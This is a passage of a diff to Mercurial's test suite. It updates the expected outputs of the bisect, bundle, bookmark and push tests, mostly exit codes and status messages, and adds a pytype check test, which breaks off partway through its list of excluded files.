$ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (2 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (2 changesets remaining, ~1 tests) 1 files updated, 0 files 
merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -350,10 +350,10 @@ $ hg bisect -r $ hg bisect -g 18 $ hg bisect -b 1 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (13 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (13 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -361,7 +361,7 @@ 6:a214d5d3811a 18:d42e18c7bc9b $ hg bisect -b # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (5 changesets remaining, ~2 tests) + Testing changeset 12:9f259202bbe7 "12" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -381,7 +381,7 @@ 13:b0a32c86eb31 15:857b178a7cf3 $ hg bisect -b # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (3 changesets remaining, ~1 tests) + Testing changeset 13:b0a32c86eb31 "13" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -414,7 +414,7 @@ $ hg bisect -r $ hg bisect -g 1 $ hg bisect -b 16 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -422,13 +422,13 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, 
~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (8 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (8 changesets remaining, ~3 tests) + Testing changeset 12:9f259202bbe7 "12" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -443,10 +443,10 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (5 changesets remaining, ~2 tests) + Testing changeset 9:3c77083deb4a "9" (5 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (5 changesets remaining, ~2 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' $ hg bisect -b @@ -500,13 +500,13 @@ $ hg bisect -r $ hg bisect -g 17 $ hg bisect -b 8 # -> update to rev 10 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 13 - Testing changeset 10:429fcd26f52d (5 changesets remaining, ~2 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets 
remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -524,7 +524,7 @@ 13:b0a32c86eb31 17:228c06deef46 $ hg bisect -s # -> update to rev 16 - Testing changeset 16:609d82a7ebae (3 changesets remaining, ~1 tests) + Testing changeset 16:609d82a7ebae "16" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -612,7 +612,7 @@ $ hg bisect -r $ hg bisect -b 17 $ hg bisect -g 11 - Testing changeset 13:b0a32c86eb31 (5 changesets remaining, ~2 tests) + Testing changeset 13:b0a32c86eb31 "13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' 2:051e12f87bf1 @@ -623,7 +623,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -665,7 +665,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect --extend - Extending search to changeset 8:dab8161ac8fc + Extending search to changeset 8:dab8161ac8fc "8" 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' $ hg log -q -r 'bisect(ignored)' @@ -677,7 +677,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g # dab8161ac8fc - Testing changeset 9:3c77083deb4a (3 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 9:3c77083deb4a @@ -757,13 +757,13 @@ $ hg bisect -r $ hg bisect -b 13 $ hg bisect -g 8 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 
changesets remaining, ~1 tests) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd 12:9f259202bbe7 $ hg bisect -g 2 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd diff --git a/tests/test-bisect3.t b/tests/test-bisect3.t --- a/tests/test-bisect3.t +++ b/tests/test-bisect3.t @@ -72,13 +72,13 @@ $ hg bisect --good 4 $ hg bisect --good 6 $ hg bisect --bad 12 - Testing changeset 9:2197c557e14c (6 changesets remaining, ~2 tests) + Testing changeset 9:2197c557e14c "9=8+3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --bad 10 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --skip 7 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved test template diff --git a/tests/test-blackbox.t b/tests/test-blackbox.t --- a/tests/test-blackbox.t +++ b/tests/test-blackbox.t @@ -317,6 +317,17 @@ 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> --debug log -r tip exited 0 after *.?? seconds (glob) 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> blackbox +Skip rotation if the .hg is read-only + +#if unix-permissions + $ chmod -w .hg + $ hg log -r. 
-T '{rev}\n' --config blackbox.maxsize=1 --debug + warning: cannot rename '$TESTTMP/blackboxtest3/.hg/blackbox.log.1' to '$TESTTMP/blackboxtest3/.hg/blackbox.log': Permission denied + warning: cannot write to blackbox.log: Permission denied + 1 + $ chmod +w .hg +#endif + Test log recursion from dirty status check $ cat > ../r.py <<EOF diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -129,10 +129,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -162,9 +162,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" @@ -241,10 +241,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: 
"check:bookmarks" 23 bytes payload @@ -275,9 +275,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" @@ -1177,7 +1177,7 @@ searching for changes no changes found abort: prepushkey hook exited with status 1 - [255] + [40] #endif @@ -1217,7 +1217,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1257,7 +1257,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1334,7 +1334,7 @@ no changes found remote: prepushkey.no-bm-move hook exited with status 1 abort: push failed on remote - [255] + [100] #endif -- test for pushing bookmarks pointing to secret changesets diff --git a/tests/test-bookmarks.t b/tests/test-bookmarks.t --- a/tests/test-bookmarks.t +++ b/tests/test-bookmarks.t @@ -1125,7 +1125,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/bookmarks.pending.saved .hg/bookmarks.pending (check visible bookmarks while transaction running in repo) @@ -1158,7 +1158,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check pretxnclose-bookmark can abort a transaction -------------------------------------------------- @@ -1242,7 +1242,7 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-public hook exited with status 1 - [255] + [40] create on a public changeset @@ -1254,4 +1254,4 @@ transaction abort! 
rollback completed abort: pretxnclose-bookmark.force-forward hook exited with status 1 - [255] + [40] diff --git a/tests/test-bundle-r.t b/tests/test-bundle-r.t --- a/tests/test-bundle-r.t +++ b/tests/test-bundle-r.t @@ -171,14 +171,15 @@ should fail $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg test-3 - abort: --base is incompatible with specifying a destination + abort: --base is incompatible with specifying destinations [10] $ hg -R test bundle -a -r tip test-bundle-branch1.hg test-3 - abort: --all is incompatible with specifying a destination + abort: --all is incompatible with specifying destinations [10] $ hg -R test bundle -r tip test-bundle-branch1.hg - abort: repository default-push not found - [255] + config error: default repository not configured! + (see 'hg help config.paths') + [30] $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg 2 changesets found @@ -223,7 +224,7 @@ adding changesets transaction abort! rollback completed - abort: 00changelog.i@93ee6ab32777: unknown parent + abort: 00changelog.i@93ee6ab32777cd430e07da694794fb6a4f917712: unknown parent [50] revision 2 diff --git a/tests/test-bundle-type.t b/tests/test-bundle-type.t --- a/tests/test-bundle-type.t +++ b/tests/test-bundle-type.t @@ -201,6 +201,15 @@ (see 'hg help bundlespec' for supported values for --type) [10] +zstd supports threading + + $ hg init test-compthreads + $ cd test-compthreads + $ hg debugbuilddag +3 + $ hg --config experimental.bundlecompthreads=1 bundle -a -t zstd-v2 zstd-v2-threaded.hg + 3 changesets found + $ cd .. + #else zstd is a valid engine but isn't available diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -295,18 +295,29 @@ #if reporevlogstore $ hg -R test debugcreatestreamclonebundle packed.hg - writing 2664 bytes for 6 files - bundle requirements: generaldelta, revlogv1, sparserevlog + writing 2664 bytes for 6 files (no-zstd !) + writing 2665 bytes for 6 files (zstd !) 
+ bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) $ f -B 64 --size --sha1 --hexdump packed.hg - packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 + packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !) + packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd no-rust !) + packed.hg: size=2860, sha1=81d7a2e535892cda51e82c200f818de2cca828d3 (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........| - 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| - 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| - 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| + 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !) + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (no-zstd !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (no-zstd !) + 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd no-rust !) + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (zstd no-rust !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (zstd no-rust !) + 0010: 00 00 00 00 0a 69 00 36 67 65 6e 65 72 61 6c 64 |.....i.6generald| (rust !) + 0020: 65 6c 74 61 2c 70 65 72 73 69 73 74 65 6e 74 2d |elta,persistent-| (rust !) + 0030: 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f 67 76 31 |nodemap,revlogv1| (rust !) $ hg debugbundle --spec packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog (rust !) generaldelta requirement is not listed in stream clone bundles unless used @@ -317,17 +328,23 @@ $ cd .. 
$ hg -R testnongd debugcreatestreamclonebundle packednongd.hg writing 301 bytes for 3 files - bundle requirements: revlogv1 + bundle requirements: revlogv1 (no-rust !) + bundle requirements: persistent-nodemap, revlogv1 (rust !) $ f -B 64 --size --sha1 --hexdump packednongd.hg - packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f + packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f (no-rust !) + packednongd.hg: size=402, sha1=d3cc1417f0e8142cf9340aaaa520b660ad3ec3ea (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 03 00 00 |HGS1UN..........| - 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| - 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| - 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| (no-rust !) + 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| (no-rust !) + 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| (no-rust !) + 0010: 00 00 00 00 01 2d 00 1c 70 65 72 73 69 73 74 65 |.....-..persiste| (rust !) + 0020: 6e 74 2d 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f |nt-nodemap,revlo| (rust !) + 0030: 67 76 31 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 |gv1.data/foo.i.6| (rust !) $ hg debugbundle --spec packednongd.hg - none-packed1;requirements%3Drevlogv1 + none-packed1;requirements%3Drevlogv1 (no-rust !) + none-packed1;requirements%3Dpersistent-nodemap%2Crevlogv1 (rust !) Warning emitted when packed bundles contain secret changesets @@ -341,7 +358,8 @@ $ hg -R testsecret debugcreatestreamclonebundle packedsecret.hg (warning: stream clone bundle will contain secret revisions) writing 301 bytes for 3 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) 
Unpacking packed1 bundles with "hg unbundle" isn't allowed @@ -733,7 +751,7 @@ partial history bundle, fails w/ unknown parent $ hg -R bundle.hg verify - abort: 00changelog.i@bbd179dfa0a7: unknown parent + abort: 00changelog.i@bbd179dfa0a71671c253b3ae0aa1513b60d199fa: unknown parent [50] full history bundle, refuses to verify non-local repo diff --git a/tests/test-bundle2-exchange.t b/tests/test-bundle2-exchange.t --- a/tests/test-bundle2-exchange.t +++ b/tests/test-bundle2-exchange.t @@ -548,7 +548,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -556,7 +556,7 @@ remote: Abandon ship! remote: (don't panic) abort: push failed on remote - [255] + [100] Doing the actual push: unknown mandatory parts @@ -570,19 +570,19 @@ pushing to other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes abort: missing support for test:unknown - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes abort: missing support for test:unknown - [255] + [100] Doing the actual push: race @@ -638,7 +638,7 @@ remote: Cleaning up the mess... 
remote: rollback completed abort: pretxnclose.failpush hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other @@ -653,7 +653,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ @@ -668,7 +668,7 @@ remote: rollback completed remote: pretxnclose.failpush hook exited with status 1 abort: push failed on remote - [255] + [100] (check that no 'pending' files remain) @@ -699,7 +699,7 @@ remote: Cleaning up the mess... remote: rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes @@ -712,7 +712,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -725,7 +725,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check output capture control. @@ -747,7 +747,7 @@ Cleaning up the mess... 
rollback completed abort: pretxnchangegroup hook exited with status 1 - [255] + [40] $ hg -R main push ssh://user@dummy/other -r e7ec4e813ba6 pushing to ssh://user@dummy/other searching for changes @@ -760,7 +760,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] $ hg -R main push http://localhost:$HGPORT2/ -r e7ec4e813ba6 pushing to http://localhost:$HGPORT2/ searching for changes @@ -773,7 +773,7 @@ remote: rollback completed remote: pretxnchangegroup hook exited with status 1 abort: push failed on remote - [255] + [100] Check abort from mandatory pushkey @@ -950,7 +950,7 @@ searching for changes remote: Lock should not be taken abort: push failed on remote - [255] + [100] $ cat >> ../lazylock/.hg/hgrc <<EOF > [experimental] diff --git a/tests/test-bundle2-remote-changegroup.t b/tests/test-bundle2-remote-changegroup.t --- a/tests/test-bundle2-remote-changegroup.t +++ b/tests/test-bundle2-remote-changegroup.t @@ -542,7 +542,7 @@ searching for changes remote: remote-changegroup abort: missing support for remote-changegroup - digest:foo - [255] + [100] Missing digest diff --git a/tests/test-casecollision-merge.t b/tests/test-casecollision-merge.t --- a/tests/test-casecollision-merge.t +++ b/tests/test-casecollision-merge.t @@ -145,7 +145,7 @@ $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 4 $ hg status -A @@ -158,7 +158,7 @@ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg merge abort: case-folding collision between [aA] and [Aa] (re) - [255] + [20] $ hg parents --template '{rev}\n' 2 $ hg status -A @@ -213,7 +213,7 @@ $ hg merge 0 abort: case-folding collision between Aa and directory of aA/a - [255] + [20] (note: no collision between 0 and 00 or 000/f) Directory case-folding collision: @@ -328,7 +328,7 @@ A B $ hg update abort: case-folding collision between [bB] and [Bb] (re) - [255] + [20] $ 
hg update --check abort: uncommitted changes diff --git a/tests/test-casefolding.t b/tests/test-casefolding.t --- a/tests/test-casefolding.t +++ b/tests/test-casefolding.t @@ -115,7 +115,7 @@ $ hg up A: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat a gold $ rm a diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -11,6 +11,7 @@ > -X contrib/python-zstandard \ > -X hgext/fsmonitor/pywatchman \ > -X mercurial/thirdparty \ + > -X mercurial/pythoncapi_compat.h \ > | sed 's-\\-/-g' | "$check_code" --warnings --per-file=0 - || false Skipping contrib/automation/hgautomation/__init__.py it has no-che?k-code (glob) Skipping contrib/automation/hgautomation/aws.py it has no-che?k-code (glob) @@ -65,10 +66,10 @@ COPYING Makefile README.rst - black.toml hg hgeditor hgweb.cgi + pyproject.toml rustfmt.toml setup.py diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,11 @@ #require black test-repo +Black needs the real USERPROFILE in order to run on Windows +#if msys + $ USERPROFILE="$REALUSERPROFILE" + $ export USERPROFILE +#endif + $ cd $RUNTESTDIR/.. - $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -85,6 +85,7 @@ class dummyrepo(object): def __init__(self): self.ui = uimod.ui() + self._wanted_sidedata = set() def filtered(self, name): pass @@ -113,6 +114,10 @@ def close(self): pass + @property + def closed(self): + pass + def main(): ui = uimod.ui() @@ -243,7 +248,10 @@ # Conforms to imanifestlog. 
ml = manifest.manifestlog( - vfs, repo, manifest.manifestrevlog(repo.svfs), repo.narrowmatch() + vfs, + repo, + manifest.manifestrevlog(repo.nodeconstants, repo.svfs), + repo.narrowmatch(), ) checkzobject(ml) checkzobject(repo.manifestlog) @@ -258,7 +266,7 @@ # Conforms to imanifestdict. checkzobject(mctx.read()) - mrl = manifest.manifestrevlog(vfs) + mrl = manifest.manifestrevlog(repo.nodeconstants, vfs) checkzobject(mrl) ziverify.verifyClass(repository.irevisiondelta, revlog.revlogrevisiondelta) @@ -272,6 +280,7 @@ flags=b'', baserevisionsize=None, revision=b'', + sidedata=b'', delta=None, ) checkzobject(rd) diff --git a/tests/test-check-module-imports.t b/tests/test-check-module-imports.t --- a/tests/test-check-module-imports.t +++ b/tests/test-check-module-imports.t @@ -14,6 +14,10 @@ Known-bad files are excluded by -X as some of them would produce unstable outputs, which should be fixed later. +NOTE: the `hg locate` command here only works on files that are known to +Mercurial. If you add an import of a new file and haven't yet `hg add`ed it, you +will likely receive warnings about a direct import. + $ testrepohg locate 'set:**.py or grep(r"^#!.*?python")' \ > 'tests/**.t' \ > -X hgweb.cgi \ diff --git a/tests/test-check-pytype.t b/tests/test-check-pytype.t new file mode 100644 --- /dev/null +++ b/tests/test-check-pytype.t @@ -0,0 +1,104 @@ +#require pytype py3 slow + + $ cd $RUNTESTDIR/.. + +Many of the individual files that are excluded here confuse pytype +because they do a mix of Python 2 and Python 3 things +conditionally. There's no good way to help it out with that as far as +I can tell, so let's just hide those files from it for now. We should +endeavor to empty this list out over time, as some of these are +probably hiding real problems. 
+ +mercurial/bundlerepo.py # no vfs and ui attrs on bundlerepo +mercurial/changegroup.py # mysterious incorrect type detection +mercurial/chgserver.py # [attribute-error] +mercurial/cmdutil.py # No attribute 'markcopied' on mercurial.context.filectx [attribute-error] +mercurial/context.py # many [attribute-error] +mercurial/copies.py # No attribute 'items' on None [attribute-error] +mercurial/crecord.py # tons of [attribute-error], [module-attr] +mercurial/debugcommands.py # [wrong-arg-types] +mercurial/dispatch.py # initstdio: No attribute ... on TextIO [attribute-error] +mercurial/exchange.py # [attribute-error] +mercurial/hgweb/hgweb_mod.py # [attribute-error], [name-error], [wrong-arg-types] +mercurial/hgweb/server.py # [attribute-error], [name-error], [module-attr] +mercurial/hgweb/webcommands.py # [missing-parameter] +mercurial/hgweb/wsgicgi.py # confused values in os.environ +mercurial/httppeer.py # [attribute-error], [wrong-arg-types] +mercurial/interfaces # No attribute 'capabilities' on peer [attribute-error] +mercurial/keepalive.py # [attribute-error] +mercurial/localrepo.py # [attribute-error] +mercurial/lsprof.py # unguarded import +mercurial/manifest.py # [unsupported-operands], [wrong-arg-types] +mercurial/minirst.py # [unsupported-operands], [attribute-error] +mercurial/patch.py # [wrong-arg-types] +mercurial/pure/osutil.py # [invalid-typevar], [not-callable] +mercurial/pure/parsers.py # [attribute-error] +mercurial/pycompat.py # bytes vs str issues +mercurial/repoview.py # [attribute-error] +mercurial/sslutil.py # [attribute-error] +mercurial/statprof.py # bytes vs str on TextIO.write() [wrong-arg-types] +mercurial/testing/storage.py # tons of [attribute-error] +mercurial/ui.py # [attribute-error], [wrong-arg-types] +mercurial/unionrepo.py # ui, svfs, unfiltered [attribute-error] +mercurial/upgrade.py # line 84, in upgraderepo: No attribute 'discard' on Dict[nothing, nothing] [attribute-error] +mercurial/util.py # [attribute-error], 
[wrong-arg-count] +mercurial/utils/procutil.py # [attribute-error], [module-attr], [bad-return-type] +mercurial/utils/stringutil.py # [module-attr], [wrong-arg-count] +mercurial/utils/memorytop.py # not 3.6 compatible +mercurial/win32.py # [not-callable] +mercurial/wireprotoframing.py # [unsupported-operands], [attribute-error], [import-error] +mercurial/wireprotoserver.py # line 253, in _availableapis: No attribute '__iter__' on Callable[[Any, Any], Any] [attribute-error] +mercurial/wireprotov1peer.py # [attribute-error] +mercurial/wireprotov1server.py # BUG?: BundleValueError handler accesses subclass's attrs +mercurial/wireprotov2server.py # [unsupported-operands], [attribute-error] + +TODO: use --no-cache on test server? Caching the files locally helps during +development, but may be a hindrance for CI testing. + + $ pytype -V 3.6 --keep-going --jobs auto mercurial \ + > -x mercurial/bundlerepo.py \ + > -x mercurial/changegroup.py \ + > -x mercurial/chgserver.py \ + > -x mercurial/cmdutil.py \ + > -x mercurial/context.py \ + > -x mercurial/copies.py \ + > -x mercurial/crecord.py \ + > -x mercurial/debugcommands.py \ + > -x mercurial/dispatch.py \ + > -x mercurial/exchange.py \ + > -x mercurial/hgweb/hgweb_mod.py \ + > -x mercurial/hgweb/server.py \ + > -x mercurial/hgweb/webcommands.py \ + > -x mercurial/hgweb/wsgicgi.py \ + > -x mercurial/httppeer.py \ + > -x mercurial/interfaces \ + > -x mercurial/keepalive.py \ + > -x mercurial/localrepo.py \ + > -x mercurial/lsprof.py \ + > -x mercurial/manifest.py \ + > -x mercurial/minirst.py \ + > -x mercurial/patch.py \ + > -x mercurial/pure/osutil.py \ + > -x mercurial/pure/parsers.py \ + > -x mercurial/pycompat.py \ + > -x mercurial/repoview.py \ + > -x mercurial/sslutil.py \ + > -x mercurial/statprof.py \ + > 